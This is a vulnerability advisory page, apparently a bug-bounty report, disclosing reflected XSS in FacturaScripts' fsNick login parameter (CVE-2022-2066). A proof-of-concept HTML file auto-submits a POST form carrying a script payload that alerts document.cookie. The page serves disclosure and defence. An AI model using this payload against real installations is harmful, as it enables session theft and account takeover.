Lucene search
Minhnb11DA4BBBFD-501F-4C7E-BE83-47778103CB59HistoryApr 27, 2022 - 7:52 a.m.
Refelect XSS in facturascripts
2022-04-2707:52:02
minhnb11
www.huntr.dev
11
xss
facturascripts
vulnerability
fsnick parameter
proof of concept
bugbounty
EPSS
0.001
Percentile
30.0%
Description
facturascripts is vulnerable to XSS in fsNick parameter
Proof of Concept
save this code as poc.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/" method="POST">
<input type="hidden" name="fsNick" value="1'"()&%<acx><ScRiPt >alert(document.cookie)</ScRiPt>" />
<input type="hidden" name="fsPassword" value="1" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
open file with your browser -> xss trigger
Related
osv
osv
Cross site scripting in facturascripts
2022-06-14 00:00:37
CVE-2022-2066
2022-06-13 13:15:13
cve
cve
CVE-2022-2066
2022-06-13 13:15:13
prion
prion
Cross site scripting
2022-06-13 13:15:00
cvelist
cvelist
github
github
Cross site scripting in facturascripts
2022-06-14 00:00:37
cnvd
cnvd
FacturaScripts Cross-Site Scripting Vulnerability
2022-06-15 00:00:00
nvd
nvd
CVE-2022-2066
2022-06-13 13:15:13
veracode
veracode
Cross-site Scripting (XSS)
2022-06-14 09:19:16